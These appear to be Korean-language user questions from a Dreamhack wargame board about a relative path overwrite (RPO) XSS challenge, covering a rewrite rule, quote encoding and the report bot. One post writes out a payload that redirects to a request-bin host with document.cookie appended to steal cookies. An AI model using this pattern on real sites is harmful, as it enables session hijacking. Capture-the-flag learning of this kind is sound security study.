Relative Path Overwrite Advanced

파일을 보면 RewriteEngine on RewriteRule ^/(.*)\.(js|css)$ /static/$1 [L] ErrorDocument 404 /404.php 라는 내용을 확인할 수 있는데, 이렇게 될 경우 정상적인 방법으로 접근해도 filter.js를 불러올 수 없습니다. (filter.js라는 uri를 넣었을 때 .js 앞의 (.*)에 해당하는 filter까지만 $1에 잡히고, /static/filter를 불러오기 때문에 오류 발생. filter.js를 로드하기 위해서는 filter.js.js 라는 uri를 사용해야 함) 이러한 동작이 의도된 것인지 질문드립니다.

location.href="https://dreamhack.io/" 일때는 %22로 URL인코딩되어 동작을 안하는데 location.href='https://dreamhack.io/' 일때는 동작을 하네요 더블쿼터는 인코딩이 되고, 싱글쿼터는 인코딩이 안되는 이유가 궁금합니다!

RPO의 개념을 클라이언트와 서버의 상대경로 해석이 달라서 발생하는것으로 이해했습니다. index.php에서 filter.js를 불러오고 있을 때 -> 클라이언트 : /index.php/static/ -> 서버 : index.php -> index.php 안에 있는 filter.js 는 /static/filter.js로 불러와짐 그런데 문제에서는 filter.js 가 불러와지지 않습니다.. 무엇을 잘못한걸까요?

패치 분기 filter=='undefined' RPO 취약성을 기반으로 우회 xss 삽입 후 해당 환경에서 외부 요청 확인 -서버 측 report후 요청이 안옴 클라이언트 측면에서 의도한데로 취약성 트리거 완료 후 서버 사이드 측면에서 특정 검사 로직이 없는 것을 확인 하였습니다. 해당 공격에 대한 응답이 오질 않아 혹시 봇이 동작하는지 궁금합니다.

location.href='https://sslpqqi.request.dreamhack.games'로 요청을 보내면 요청이 보내지는데 뒤에 +document.cookie를 추가해서 보내면 요청이 안 보내집니다... 어떻게 해야하나요 도와주세요.